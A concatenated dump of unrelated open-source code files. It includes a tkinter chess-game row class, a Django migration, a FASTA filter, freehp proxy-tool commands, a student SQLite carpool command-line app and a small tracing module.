                    pady=1,
                    padx=0,
                ),
                GRID_CONFIGURE: dict(column=2, sticky=tkinter.EW),
                ROW: 0,
            },
            {
                WIDGET: tkinter.Label,
                WIDGET_CONFIGURE: dict(
                    anchor=tkinter.W,
                    font=constants.LISTS_OF_GAMES_FONT,
                    pady=1,
                    padx=0,
                ),
                GRID_CONFIGURE: dict(column=3, sticky=tkinter.EW),
                ROW: 0,
            },
            {
                WIDGET: tkinter.Label,
                WIDGET_CONFIGURE: dict(
                    anchor=tkinter.W,
                    font=constants.LISTS_OF_GAMES_FONT,
                    pady=1,
                    padx=0,
                ),
                GRID_CONFIGURE: dict(column=4, sticky=tkinter.EW),
                ROW: 0,
            },
            {
                WIDGET: tkinter.Label,
                WIDGET_CONFIGURE: dict(
                    anchor=tkinter.W,
                    font=constants.LISTS_OF_GAMES_FONT,
                    pady=1,
                    padx=10,
                ),
                GRID_CONFIGURE: dict(column=5, sticky=tkinter.EW),
                ROW: 0,
            },
        ]

    def show_row(self, dialog, oldobject):
        """Return a GameDbShow toplevel for instance.

        dialog - a Toplevel
        oldobject - a ChessDBrecordGame containing original data
        """
        return GameDbShow(dialog, oldobject, ui=self.ui)

    def delete_row(self, dialog, oldobject):
        """Return a GameDbDelete toplevel for instance.

        dialog - a Toplevel
        oldobject - a ChessDBrecordGame containing original data
        """
        return GameDbDelete(dialog, oldobject, ui=self.ui)

    def edit_row(self, dialog, newobject, oldobject, showinitial=True):
        """Return a GameDbEdit toplevel for instance.

        dialog - a Toplevel
        newobject - a ChessDBrecordGame containing original data to be edited
        oldobject - a ChessDBrecordGame containing original data
        showinitial == True - show both original and edited data
        """
        return GameDbEdit(
            newobject, dialog, oldobject, showinitial=showinitial, ui=self.ui
        )

    def grid_row(self, **kargs):
        """Return super(ChessDBrowGame,).grid_row(textitems=(...), **kargs).

        Create textitems argument for ChessDBrowGame instance.
        """
        tags = self.value.collected_game._tags
        return super(ChessDBrowGame, self).grid_row(
            textitems=(
                tags.get(TAG_WHITE, DEFAULT_TAG_VALUE),
                tags.get(TAG_RESULT, DEFAULT_TAG_RESULT_VALUE),
                tags.get(TAG_BLACK, DEFAULT_TAG_VALUE),
                tags.get(TAG_EVENT, DEFAULT_TAG_VALUE),
                tags.get(TAG_DATE, DEFAULT_TAG_DATE_VALUE),
                # Trailing column: remaining tags as 'Tag "value"' pairs.
                " ".join(
                    [
                        "".join((tag, ' "', value, '"'))
                        for tag, value in self.get_tags_display_order(
                            self.value
                        )
                    ]
                ),
            ),
            **kargs
        )

    def get_tags_display_order(self, pgn):
        """Return [(tag, value), ...] for the trailing 'Tags' column.

        Seven Tag Roster tags that are not already grid columns come first,
        followed by all non-roster tags sorted by name.  *pgn* is unused;
        values are read from self.value.
        """
        str_tags = []
        other_tags = []
        tags = self.value.collected_game._tags
        for t in SEVEN_TAG_ROSTER:
            if t not in constants.GRID_HEADER_SEVEN_TAG_ROSTER:
                str_tags.append((t, tags.get(t, DEFAULT_TAG_VALUE)))
        for t, v in sorted(tags.items()):
            if t not in SEVEN_TAG_ROSTER:
                other_tags.append((t, v))
        return str_tags + other_tags

    def set_background_on_display(self, widgets):
        """Set background of *widgets* to the 'on display' highlight colour."""
        self._current_row_background = ON_DISPLAY_COLOUR
        self.set_background(widgets, self._current_row_background)

    def grid_row_on_display(self, **kargs):
        """Return grid_row(...) rendered with the 'on display' background."""
        self._current_row_background = ON_DISPLAY_COLOUR
        return self.grid_row(background=ON_DISPLAY_COLOUR, **kargs)
def make_ChessDBrowGame(chessui):
    """Return a row factory producing ChessDBrowGame rows bound to *chessui*."""

    def make_position(database=None):
        # Every row produced by this factory shares the single ChessUI
        # instance captured in the enclosing scope.
        return ChessDBrowGame(database=database, ui=chessui)

    return make_position
| StarcoderdataPython |
94631 | from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial schema: Bookmark, Note, and a generic Tag model."""

    initial = True

    dependencies = [
        ('contenttypes', '0002_remove_content_type_name'),
    ]

    operations = [
        migrations.CreateModel(
            name='Bookmark',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('url', models.URLField()),
            ],
        ),
        migrations.CreateModel(
            name='Note',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('text', models.TextField()),
            ],
        ),
        # Tag can point at any model instance via the contenttypes
        # framework (content_type + object_id form a generic foreign key).
        migrations.CreateModel(
            name='Tag',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('tag', models.SlugField()),
                ('object_id', models.PositiveIntegerField()),
                ('content_type', models.ForeignKey(on_delete=models.CASCADE, to='contenttypes.ContentType')),
            ],
        ),
    ]
| StarcoderdataPython |
48026 | <gh_stars>0
from Bio import SeqIO  # third-party: biopython (pip install biopython)

# Filter a FASTA file, keeping only COI-5P barcode records.  Record headers
# are pipe-delimited (e.g. ">id|taxon|COI-5P|..."), so field index 2 holds
# the marker name.
with open("Danaus.fas", "rU") as handle:
    for record in SeqIO.parse(handle, "fasta"):
        fields = record.description.split('|')
        if fields[2] == 'COI-5P':
            # print() calls (instead of the old Python-2 print statements)
            # keep the script runnable on both Python 2 and Python 3.
            print('>' + record.description)
            print(record.seq)
| StarcoderdataPython |
1687664 | # Copyright (c) 2013 Shotgun Software Inc.
#
# CONFIDENTIAL AND PROPRIETARY
#
# This work is provided "AS IS" and subject to the Shotgun Pipeline Toolkit
# Source Code License included in this distribution package. See LICENSE.
# By accessing, using, copying or modifying this work you indicate your
# agreement to the Shotgun Pipeline Toolkit Source Code License. All rights
# not expressly granted therein are reserved by Shotgun Software Inc.
# The storage name that is treated to be the primary storage for tank.
PRIMARY_STORAGE_NAME = "primary"

# Name of the hook that is invoked during folder creation.
PROCESS_FOLDER_CREATION_HOOK_NAME = "process_folder_creation"
3243206 | <filename>freehp/commands.py<gh_stars>1-10
# coding=utf-8
import logging
from os.path import isfile
from freehp.errors import UsageError
from freehp import utils
from freehp.version import __version__
from freehp.manager import ProxyManager
from freehp import config
from freehp import squid
log = logging.getLogger(__name__)
class Command:
    """Base class for freehp command-line subcommands.

    Subclasses override ``_import_settings`` to declare their Setting
    classes and ``run`` to implement the command.
    """

    def __init__(self):
        self.config = config.BaseConfig()
        self.exitcode = 0
        self.settings = self._make_settings()

    def _import_settings(self):
        """Return the Setting classes this command exposes (None = none)."""
        pass

    def _make_settings(self):
        """Instantiate every declared ``config.Setting`` subclass."""
        classes = self._import_settings() or ()
        return [cls() for cls in classes if issubclass(cls, config.Setting)]

    @property
    def name(self):
        return ""

    @property
    def syntax(self):
        return ""

    @property
    def short_desc(self):
        return ""

    @property
    def long_desc(self):
        return self.short_desc

    def add_arguments(self, parser):
        """Register one argparse argument per setting."""
        for setting in self.settings:
            setting.add_argument(parser)

    def process_arguments(self, args):
        """Copy explicitly supplied argument values into the config."""
        for setting in self.settings:
            value = getattr(args, setting.name)
            if value is not None:
                self.config.set(setting.name, value)

    def run(self, args):
        raise NotImplementedError
class RunCommand(Command):
    """``freehp run`` -- start the proxy-scraping agent."""

    @property
    def name(self):
        return "run"

    @property
    def syntax(self):
        return "[OPTIONS]"

    @property
    def short_desc(self):
        return "Run spider to scrap free HTTP proxies"

    def _import_settings(self):
        return (config.Bind, config.Daemon, config.PidFile,
                config.LogLevel, config.LogFile,
                config.MinAnonymity, config.CheckerTimeout)

    def add_arguments(self, parser):
        parser.add_argument('-c', '--config', dest='config', metavar='FILE',
                            help='configuration file')
        super().add_arguments(parser)
        parser.add_argument("-s", "--set", dest="set", action="append", default=[], metavar="NAME=VALUE",
                            help="set/override setting (can be repeated)")

    def process_arguments(self, args):
        # Precedence: config-file values first, then explicit command-line
        # options (via super()), and finally -s NAME=VALUE overrides.
        if args.config is not None:
            try:
                c = utils.load_config(args.config)
            except Exception:
                raise RuntimeError('Cannot read the configuration file {}'.format(args.config))
            for k, v in utils.iter_settings(c):
                self.config.set(k, v)
        super().process_arguments(args)
        try:
            self.config.update(dict(x.split("=", 1) for x in args.set))
        except ValueError:
            raise UsageError("Invalid -s value, use -s NAME=VALUE")

    def run(self, args):
        """Build the final config, optionally daemonize, then start the agent."""
        cfg = config.Config()
        cfg.update(self.config)
        if cfg.getbool('daemon'):
            utils.be_daemon()
        utils.configure_logging('freehp', cfg)
        try:
            agent = ProxyManager(cfg)
            agent.start()
        except Exception as e:
            # Top-level boundary: log and exit quietly rather than traceback.
            log.error(e, exc_info=True)
class SquidCommand(Command):
    """``freehp squid`` -- append scraped proxies to a squid configuration."""

    @property
    def name(self):
        return "squid"

    @property
    def syntax(self):
        return "[OPTIONS] <DEST_FILE>"

    @property
    def short_desc(self):
        return "Append proxies to the configuration of squid"

    def _import_settings(self):
        return (squid.AddressSetting, squid.SquidSetting,
                config.Daemon, config.MinAnonymity,
                squid.MaxNumSetting, squid.HttpsSetting, squid.PostSetting,
                squid.UpdateIntervalSetting, squid.TimeoutSetting, squid.OnceSetting,
                config.LogLevel, config.LogFile)

    def add_arguments(self, parser):
        parser.add_argument('dest_file', metavar='FILE', nargs=1,
                            help='where the squid configuration file is')
        parser.add_argument('-t', '--template', dest='template', metavar='FILE',
                            help='the template of squid configuration, default is the configuration file')
        super().add_arguments(parser)

    def process_arguments(self, args):
        # nargs=1 yields a one-element list; unwrap to the plain path.
        args.dest_file = args.dest_file[0]
        if not args.template:
            # No explicit template: fall back to the existing destination
            # file, which therefore must already exist.
            if not isfile(args.dest_file):
                raise UsageError('The template of squid configuration is not specified')
            args.template = args.dest_file
        super().process_arguments(args)

    def run(self, args):
        """Build the squid config, optionally daemonize, then start updating."""
        cfg = squid.SquidConfig()
        cfg.update(self.config)
        if cfg.getbool('daemon'):
            utils.be_daemon()
        utils.configure_logging('freehp', cfg)
        try:
            s = squid.Squid(args.dest_file, args.template, config=cfg)
            s.start()
        except Exception as e:
            # Top-level boundary: log and exit quietly rather than traceback.
            log.error(e, exc_info=True)
class VersionCommand(Command):
    """``freehp version`` -- print the installed freehp version."""

    @property
    def name(self):
        return "version"

    @property
    def short_desc(self):
        return "Print the version"

    def run(self, args):
        # Same output as the previous str.format version.
        print("freehp version " + __version__)
| StarcoderdataPython |
4820457 | <reponame>ceciliaccwei/CMPUT291-proj1<filename>project.py
import sqlite3
import getpass
import time
import os
import sys

# Usage: python PROJECT.py DATABASE.db -- the single argument is the path
# to an existing SQLite database file.
if len(sys.argv) != 2:
    print("Please run with: python PROJECT.py DATABASE.db")
    quit()
db_file_path = sys.argv[1]
if not (os.path.exists(db_file_path)):
    print("File does not exist!")
    quit()

# Module-level connection and cursor shared by every function below.
conn = sqlite3.connect(db_file_path)
c = conn.cursor()
def main():
    # Flush any pending writes, then (re-)enter the top-level menu.  The
    # menu functions call main() recursively instead of returning to it.
    conn.commit()
    start()
def start():
    """Top-level menu loop: login, sign up, or exit."""
    while True:
        print("Welcome to the carpool system!")
        print("1. Login")
        print("2. Sign up")
        print("3. Exit")
        command = raw_input("What would you like to do today?")
        if command == '1':
            login()
        elif command == '2':
            signup()
            continue
        elif command == '3':
            quit()
        else:
            print("Command not found!")
def signup():
    """Interactively create a new member account, then return to main()."""
    while True:
        email = raw_input("Please enter your email (or BACK): ").lower()
        if email == 'back':
            main()
        c.execute("SELECT * FROM members WHERE email like ?;", (email,))
        dup = c.fetchone()
        if dup is None:
            break
        else:
            print("This email has already been signed up.")
    password = getpass.getpass("Enter your password: ")
    name = raw_input("Please enter your name: ")
    while True:
        try:
            phone = int(raw_input("Please enter your phone number: "))
            break
        except ValueError:
            print("Invalid input!")
            continue
    # Parameterised query: the previous %-interpolated INSERT allowed SQL
    # injection and broke on names containing quotes.
    # NOTE(review): the password is stored in plain text; it should be hashed.
    c.execute("INSERT INTO members VALUES (?, ?, ?, ?);",
              (email, name, phone, password))
    conn.commit()
    print("You have successfully signed up!")
    main()
def login():
    """Prompt for credentials; on success show unread messages and the menu."""
    while True:
        email = raw_input("Please enter your email (or BACK): ").lower()
        if email == 'back':
            break
        c.execute("SELECT * FROM members WHERE email like ?;", (email,))
        username = c.fetchone()
        if username is None:
            print("Username does not exist")
        else:
            # Fixed: read the password with getpass (the previous line was
            # corrupted and did not parse).  All queries are parameterised;
            # the old %-interpolation allowed SQL injection.
            password = getpass.getpass("Enter your password: ")
            c.execute("SELECT * FROM members WHERE email like ? and pwd = ?;",
                      (email, password))
            check_login = c.fetchone()
            if check_login is None:
                print("Incorrect email or password, please try again.")
            else:
                print("Welcome!")
                user = email
                # Show unread messages, then mark them all as seen.
                c.execute("SELECT msgTimestamp,sender,rno,content FROM inbox "
                          "WHERE email like ? and seen like ?;", (user, 'n'))
                print("".join('%-22s' % x[0] for x in c.description))
                ar = [[str(item) for item in results] for results in c.fetchall()]
                for row in ar:
                    print("".join('%-22s' % x for x in row))
                c.execute("UPDATE inbox SET seen = ? where seen like ? and email like ?;",
                          ('y', 'n', user))
                conn.commit()
                chooseOptionCategory(user)
                break
def chooseOptionCategory(user):
    """Logged-in top menu: dispatch to ride/booking/request sub-menus."""
    while True:
        print("1. Rides")
        print("2. Bookings")
        print("3. Requests")
        print("4. Log out")
        print("5. Exit")
        option = raw_input("Your option: ")
        if option == '1':
            RidesRelated(user)
        elif option == '2':
            BookingsRelated(user)
        elif option == '3':
            RequestRelated(user)
        elif option == '4':
            # Log out: main() restarts the welcome menu (recursive design).
            main()
        elif option == '5':
            quit()
        else:
            print("Command not found!")
def RidesRelated(user):
    """Ride sub-menu: offer a ride or search existing rides."""
    while True:
        print("1. Offer a ride")
        print("2. Search rides")
        print("3. Go back")
        print("4. Log out")
        print("5. Exit")
        option = raw_input("Your option: ")
        if option == '1':
            offerRide(user)
        elif option == '2':
            searchRides(user)
        elif option == '3':
            break
        elif option == '4':
            main()
        elif option == '5':
            quit()
        else:
            print("Command not found!")
def BookingsRelated(user):
    """Booking sub-menu: list/cancel bookings or book someone on a ride."""
    while True:
        print("1. List all confirmed bookings on my rides")
        print("2. Book someone on my ride")
        print("3. Go back")
        print("4. Log out")
        print("5. Exit")
        option = raw_input("Your option: ")
        if option == '1':
            bookingList(user)
        elif option == '2':
            rideList(user)
        elif option == '3':
            break
        elif option == '4':
            main()
        elif option == '5':
            quit()
        else:
            print("Command not found!")
def rideList(user):
    """List the driver's rides and interactively book a member onto one.

    Fixes over the previous version: stray debug ``print(user)`` removed,
    ownership query parameterised (was %-interpolated: SQL injection), and
    the drop-off validation loop no longer calls ``searchLoc(dst)`` with an
    undefined name (NameError on any unknown drop-off location).
    """
    # List this driver's rides together with the seats still available.
    c.execute("SELECT r.*, \
               r.seats - ifnull(sum(b.seats) ,0) as seats_avaliable \
               from rides r \
               left join \
               bookings b \
               on r.rno = b.rno \
               where r.driver like ? \
               group by r.rno;", (user,))
    print("".join('%-13s' % x[0] for x in c.description))
    ar = [[str(item) for item in results] for results in c.fetchall()]
    prtFive(ar)
    while True:
        print("Enter the rno to book")
        rno = raw_input("Or enter Back to go back: ")
        try:
            rno = int(rno)
            c.execute("SELECT * FROM rides WHERE driver like ? and rno = ?;",
                      (user, rno))
            if c.fetchone() is None:
                print("That's not your ride!")
                continue
            else:
                break
        except ValueError:
            # Any non-integer input (e.g. "Back") returns to the caller.
            return
    while True:
        email = raw_input("Please enter the member's email: ").lower()
        c.execute("SELECT * FROM members WHERE email like ?;", (email,))
        if c.fetchone() is None:
            print("Member does not exist!")
            continue
        else:
            break
    c.execute("SELECT r.seats - ifnull(sum(b.seats) ,0) \
               from rides r \
               left join \
               bookings b \
               on r.rno = b.rno \
               where r.rno = ? \
               group by r.rno;", (rno,))
    seats_avaliable = int(c.fetchone()[0])
    while True:
        try:
            cost = int(raw_input("Please enter your cost: "))
            break
        except ValueError:
            print("Invalid input!")
            continue
    while True:
        try:
            seats = int(raw_input("Please enter your seats booked: "))
            break
        except ValueError:
            print("Invalid input!")
            continue
    c.execute("SELECT lcode FROM locations")
    ar = [[str(item) for item in results] for results in c.fetchall()]
    pickup = raw_input("Please enter the pickup loc: ")
    while [pickup] not in ar:
        searchLoc(pickup)
        pickup = raw_input("Please enter the pickup loc: ")
    dropoff = raw_input("Please enter the dropoff loc: ")
    while [dropoff] not in ar:
        searchLoc(dropoff)
        dropoff = raw_input("Please enter the dropoff loc: ")
    seen = 'n'
    c.execute("SELECT ifnull(max(bno),0) FROM bookings")
    bno = int(c.fetchone()[0]) + 1

    def _book():
        # Insert the booking and notify the booked member (shared by the
        # normal and the overbook confirmation paths).
        c.execute("INSERT INTO bookings VALUES (?,?,?,?,?,?,?);",
                  (bno, email, rno, cost, int(seats), pickup, dropoff))
        content = "your booking: " + str(bno) + " is confirmed!"
        msgTimestamp = time.strftime("%Y-%m-%d %H:%M:%S")
        c.execute("INSERT INTO inbox VALUES (?,?,?,?,?,?);",
                  (email, msgTimestamp, user, content, rno, seen))
        conn.commit()
        print("message sent!")

    if seats <= seats_avaliable:
        _book()
    else:
        option = raw_input("Are you sure to overbook? [Y/N]")
        if option.upper() == 'Y':
            _book()
        else:
            return
def bookingList(user):
    """List confirmed bookings on this driver's rides; optionally cancel one."""
    c.execute("SELECT b.* FROM bookings b, rides r\
               where b.rno = r.rno and r.driver = ?;", (user,))
    print("".join('%-13s' % x[0] for x in c.description))
    ar = [[str(item) for item in results] for results in c.fetchall()]
    prtFive(ar)
    print("Enter the bno to cancel")
    bno = raw_input("Or enter Back to go back: ")
    if bno.upper() == 'BACK':
        return
    try:
        bno = int(bno)
    except ValueError:
        # Previously any non-integer, non-"Back" input crashed with ValueError.
        print("Invalid input!")
        return
    c.execute("SELECT email,rno FROM bookings WHERE bno = ?;", (bno,))
    temp = c.fetchone()
    if temp is None:
        # Previously an unknown bno crashed with TypeError (indexing None).
        print("Booking not found!")
        return
    email = str(temp[0])
    rno = int(temp[1])
    c.execute("DELETE FROM bookings WHERE bno= ?;", (bno,))
    # Notify the member whose booking was cancelled.
    content = "Your booking " + str(bno) + " is cancelled"
    seen = 'n'
    msgTimestamp = time.strftime("%Y-%m-%d %H:%M:%S")
    c.execute("INSERT INTO inbox VALUES (?,?,?,?,?,?);",
              (email, msgTimestamp, user, content, rno, seen))
    conn.commit()
    print("Booking cancelled!")
def RequestRelated(user):
    """Request sub-menu: post, list own, or search requests."""
    while True:
        print("1. Post a request")
        print("2. List my own requests")
        print("3. Search requests")
        print("4. Go back")
        print("5. Log out")
        print("6. Exit")
        option = raw_input("Your option: ")
        if option == '1':
            postRequest(user)
        elif option == '2':
            myRequest(user)
        elif option == '3':
            searchRequest(user)
        elif option == '4':
            break
        elif option == '5':
            main()
        elif option == '6':
            quit()
        else:
            print("Command not found!")
def offerRide(user):
    """Interactively create a new ride offer plus optional enroute stops.

    The two car-ownership queries are now parameterised; the previous
    %-interpolation of *user* (an email string) allowed SQL injection.
    """
    c.execute("SELECT ifnull(max(rno),0) FROM rides")
    rno = int(c.fetchone()[0]) + 1
    while True:
        try:
            price = float(raw_input("Please enter the price: "))
            break
        except ValueError:
            print("Invalid input!")
            continue
    while True:
        rdate = raw_input("Please enter the date in YYYY-MM-DD format: ")
        try:
            time.strptime(rdate, "%Y-%m-%d")
            break
        except ValueError:
            print("Invalid input!")
            continue
    while True:
        seats = raw_input("Please enter the seats offered: ")
        try:
            seats = int(seats)
            break
        except ValueError:
            print("Invalid input!")
            continue
    c.execute("SELECT lcode FROM locations")
    ar = [[str(item) for item in results] for results in c.fetchall()]
    src = raw_input("Please enter your src: ")
    while [src] not in ar:
        searchLoc(src)
        src = raw_input("Please enter your src: ")
    dst = raw_input("Please enter your dst: ")
    while [dst] not in ar:
        searchLoc(dst)
        dst = raw_input("Please enter your dst: ")
    lugDesc = raw_input("Please enter the luggage description: ")
    while True:
        cno = raw_input("Please enter the car number: ")
        if cno == '':
            # Empty input means the ride has no associated car.
            cno = None
            break
        try:
            cno = int(cno)
        except ValueError:
            print("Invalid input!")
            continue
        c.execute("SELECT * FROM cars WHERE owner like ? and cno = ?;",
                  (user, cno))
        if c.fetchone() is None:
            print("That's not your car!")
            # Show the user's own cars so they can pick a valid one.
            c.execute("SELECT * from cars where owner like ?;", (user,))
            print("".join('%-20s' % x[0] for x in c.description))
            for row in [[str(item) for item in results] for results in c.fetchall()]:
                print("".join('%-20s' % x for x in row))
            continue
        break
    c.execute("INSERT INTO rides VALUES (?,?,?,?,?,?,?,?,?);",
              (rno, price, rdate, seats, lugDesc, src, dst, user, cno))
    conn.commit()
    c.execute("SELECT lcode FROM locations")
    ar = [[str(item) for item in results] for results in c.fetchall()]
    enroute = raw_input("Please enter the enroute location: ")
    while enroute != '':
        while [enroute] not in ar:
            searchLoc(enroute)
            enroute = raw_input("Please enter your enroute location: ")
        c.execute("INSERT INTO enroute VALUES (?,?);", (rno, enroute))
        enroute = raw_input("Please enter next enroute location: ")
    conn.commit()
    print("New ride offered!")
def searchRides(user):
    """Search rides by 1-3 location keywords (AND semantics: results are the
    set intersection of the per-keyword matches), then offer booking."""
    keyword1 = raw_input("Keyword1: ")
    keyword2 = raw_input("Keyword2: ")
    if keyword2 != '':
        keyword3 = raw_input("Keyword3: ")
        if keyword3 != '':
            # search by all 3 keywords
            searchbyK1 = searchKeyword(keyword1)
            searchbyK2 = searchKeyword(keyword2)
            searchbyK3 = searchKeyword(keyword3)
            ar = list((set(tuple(i) for i in searchbyK1)&set(tuple(j) for j in searchbyK2)&set(tuple(k) for k in searchbyK3)))
        else:
            # search by 2 keywords
            searchbyK1 = searchKeyword(keyword1)
            searchbyK2 = searchKeyword(keyword2)
            ar = list((set(tuple(i) for i in searchbyK1)&set(tuple(j) for j in searchbyK2)))
    else:
        # search by 1 keyword only
        ar = searchKeyword(keyword1)
    # Fixed header matching the column order of searchKeyword's SELECT.
    description = ['rno', 'price', 'rdate', 'seats', 'lugDesc', 'src', 'dst', 'driver', 'cno', 'make', 'model', 'year', 'seats']
    print("".join('%-13s'%x for x in description))
    ar = map(list,ar)
    # Sort by ride number for stable display order.
    ar = sorted(ar, key=lambda x: int(x[0]))
    prtFive(ar)
    messageDriver(user)
def searchKeyword(keyword):
    """Return ride rows (with car columns) where *keyword* matches any
    location field of the ride's source, destination, or an enroute stop."""
    # First SELECT: rides with an enroute stop whose location matches.
    # Second SELECT: rides whose src or dst location matches.
    # UNION removes duplicates between the two result sets.
    c.execute("SELECT r.*,c.make,c.model,c.year,c.seats FROM rides r,enroute er,locations l \
    left join cars c on r.cno = c.cno \
    where (er.lcode = l.lcode and er.rno = r.rno)\
    and\
    (l.lcode like ? or l.city like ? or l.prov like ? or l.address like ?)\
    union \
    SELECT DISTINCT r.*,c.make,c.model,c.year,c.seats FROM rides r,locations l1, locations l2\
    left join cars c on r.cno = c.cno \
    WHERE (r.src = l1.lcode and r.dst =l2.lcode)\
    and\
    (l1.lcode like ? or l1.city like ? or l1.prov like ? or l1.address like ? or \
    l2.lcode like ? or l2.city like ? or l2.prov like ? or l2.address like ? );",
    ('%'+keyword+'%','%'+keyword+'%','%'+keyword+'%','%'+keyword+'%',
    '%'+keyword+'%','%'+keyword+'%','%'+keyword+'%','%'+keyword+'%',
    '%'+keyword+'%','%'+keyword+'%','%'+keyword+'%','%'+keyword+'%'))
    result = [[str(item) for item in results] for results in c.fetchall()]
    return result
def messageDriver(user):
    """Send a booking-request message to the driver of a chosen ride.

    Fixes over the previous version: driver lookup parameterised (was
    %-interpolated), a guard against a non-existent ride number (previously
    crashed indexing None), and the drop-off loop no longer calls
    ``searchLoc(dst)`` with an undefined name (NameError).
    """
    while True:
        rno = raw_input("Please enter the ride where you want to book:(BACK to go back) ")
        if rno.upper() == 'BACK':
            return
        try:
            rno = int(rno)
            break
        except ValueError:
            print("Invalid input!")
    c.execute("SELECT driver FROM rides WHERE rno = ?;", (rno,))
    row = c.fetchone()
    if row is None:
        print("Ride not found!")
        return
    email = str(row[0])
    msgTimestamp = time.strftime("%Y-%m-%d %H:%M:%S")
    while True:
        try:
            cost = int(raw_input("Please enter your cost: "))
            break
        except ValueError:
            print("Invalid input!")
            continue
    while True:
        try:
            seats = int(raw_input("Please enter your seats booked: "))
            break
        except ValueError:
            print("Invalid input!")
            continue
    c.execute("SELECT lcode FROM locations")
    ar = [[str(item) for item in results] for results in c.fetchall()]
    pickup = raw_input("Please enter the pickup loc: ")
    while [pickup] not in ar:
        searchLoc(pickup)
        pickup = raw_input("Please enter the pickup loc: ")
    dropoff = raw_input("Please enter the dropoff loc: ")
    while [dropoff] not in ar:
        searchLoc(dropoff)
        dropoff = raw_input("Please enter the dropoff loc: ")
    content = "cost:" + str(cost) + "; " + "seats:" + str(seats) + "; " + "pickup:" + pickup + "; " + "dropoff: " + dropoff + "; "
    seen = 'n'
    c.execute("INSERT INTO inbox VALUES (?,?,?,?,?,?)",
              (email, msgTimestamp, user, content, rno, seen))
    conn.commit()
    print("message sent!")
def postRequest(user):
    """Post a new ride request (date, pickup, dropoff, offered amount).

    Fixed: the drop-off validation loop previously called ``searchLoc(dst)``
    with an undefined name, raising NameError on any unknown location.
    """
    c.execute("SELECT ifnull(max(rid),0) FROM requests")
    rid = int(c.fetchone()[0]) + 1
    while True:
        rdate = raw_input("Please enter the date in YYYY-MM-DD format: ")
        try:
            time.strptime(rdate, "%Y-%m-%d")
            break
        except ValueError:
            print("Invalid input!")
            continue
    c.execute("SELECT lcode FROM locations")
    ar = [[str(item) for item in results] for results in c.fetchall()]
    pickup = raw_input("Please enter the pickup loc: ")
    while [pickup] not in ar:
        searchLoc(pickup)
        pickup = raw_input("Please enter the pickup loc: ")
    dropoff = raw_input("Please enter the dropoff loc: ")
    while [dropoff] not in ar:
        searchLoc(dropoff)
        dropoff = raw_input("Please enter the dropoff loc: ")
    while True:
        try:
            amount = int(raw_input("Please enter the amount you are willing to pay per seat: "))
            break
        except ValueError:
            print("Invalid input!")
            continue
    c.execute("INSERT INTO requests VALUES (?,?,?,?,?,?)",
              (rid, user, rdate, pickup, dropoff, amount))
    conn.commit()
    print("Request posted!")
def searchLoc(word):
    """Print locations whose code, city, province or address contains *word*."""
    pattern = '%' + word + '%'
    c.execute("SELECT * FROM locations where lcode like ? or city like ? "
              "or prov like ? or address like ?;",
              (pattern, pattern, pattern, pattern))
    header = "".join('%-13s' % col[0] for col in c.description)
    print(header)
    rows = [[str(field) for field in record] for record in c.fetchall()]
    prtFive(rows)
def myRequest(user):
    """List the logged-in member's own requests and optionally delete one."""
    c.execute("SELECT * FROM requests where email like ?;", (user,))
    print("".join('%-13s' % x[0] for x in c.description))
    ar = [[str(item) for item in results] for results in c.fetchall()]
    for row in ar:
        print("".join('%-13s' % x for x in row))
    while True:
        print("Enter the rid to delete")
        rid = raw_input("Or enter Back to go back: ")
        try:
            rid = int(rid)
            # Parameterised (was %-interpolation: SQL injection via user).
            c.execute("SELECT * FROM requests WHERE email like ? and rid = ?;",
                      (user, rid))
            check_ride = c.fetchone()
            if check_ride is None:
                print("That's not your request!")
                continue
            else:
                c.execute("DELETE FROM requests WHERE rid = ?;", (rid,))
                conn.commit()
                print("Request deleted!")
                break
        except ValueError:
            # Non-integer input (e.g. "Back") leaves the menu.
            return
def searchRequest(user):
    """Search requests by pickup location and message the requester."""
    # NOTE(review): the prompt typo "enther" and the unvalidated rid/rno
    # inputs are runtime strings/behaviour and are left unchanged here.
    keyword = raw_input("Please enther the pickup location to search: ")
    c.execute("SELECT r.* FROM requests r, locations l\
    WHERE (r.pickup = l.lcode and (\
    l.lcode like ? or l.city like ?\
    ));",
    ('%'+keyword+'%','%'+keyword+'%'))
    print("".join('%-13s'%x[0] for x in c.description))
    ar = [[str(item) for item in results] for results in c.fetchall()]
    prtFive(ar)
    print("Enter the rid to select")
    rid = raw_input("Or enter Back to go back: ")
    if rid.upper() == 'BACK':
        return
    else:
        rid = int(rid)
        c.execute("SELECT email FROM requests where rid = ?;",(rid,))
        email = str(c.fetchone()[0])
        content = raw_input("Enter your message to the person: ")
        seen = 'n'
        msgTimestamp = time.strftime("%Y-%m-%d %H:%M:%S")
        rno = raw_input("Please enter the ride number: ")
        c.execute("INSERT INTO inbox VALUES (?,?,?,?,?,?)",(email,msgTimestamp,user,content,rno,seen))
        conn.commit()
        print("Message sent!")
def prtFive(ar):
    """Print rows of *ar* five at a time, prompting before each extra page."""
    shown = 5
    for row in ar[:shown]:
        print("".join('%-13s' % cell for cell in row))
    while len(ar) > 5:
        answer = raw_input("enter Y to see more: ")
        if answer.upper() != 'Y':
            break
        nxt = shown + 5
        if nxt > len(ar):
            # Final (short) page: print the remainder and stop.
            for row in ar[shown:]:
                print("".join('%-13s' % cell for cell in row))
            break
        for row in ar[shown:nxt]:
            print("".join('%-13s' % cell for cell in row))
        shown = nxt
main()
| StarcoderdataPython |
8231 | <reponame>davidhozic/Discord-Shiller
"""
~ Tracing ~
This modules containes functions and classes
related to the console debug long or trace.
"""
from enum import Enum, auto
import time
__all__ = (
"TraceLEVELS",
"trace"
)
m_use_debug = None
class TraceLEVELS(Enum):
    """Severity level of a trace message (NORMAL < WARNING < ERROR)."""
    NORMAL = 0          # informational output
    WARNING = auto()    # suspicious but recoverable condition
    ERROR = auto()      # failure
def trace(message: str,
          level: TraceLEVELS = TraceLEVELS.NORMAL):
    """Print *message* with a timestamp and severity, if debugging is enabled.

    Parameters:
        message: text to display
        level:   severity of the trace (defaults to TraceLEVELS.NORMAL)

    Does nothing unless the module-level `m_use_debug` flag is truthy.
    """
    if not m_use_debug:
        return
    now = time.localtime()
    stamp = "Date: {:02d}.{:02d}.{:04d} Time:{:02d}:{:02d}".format(
        now.tm_mday, now.tm_mon, now.tm_year, now.tm_hour, now.tm_min)
    print(f"{stamp}\nTrace level: {level.name}\nMessage: {message}\n")
| StarcoderdataPython |
149900 | import pickle
import sys
import zlib
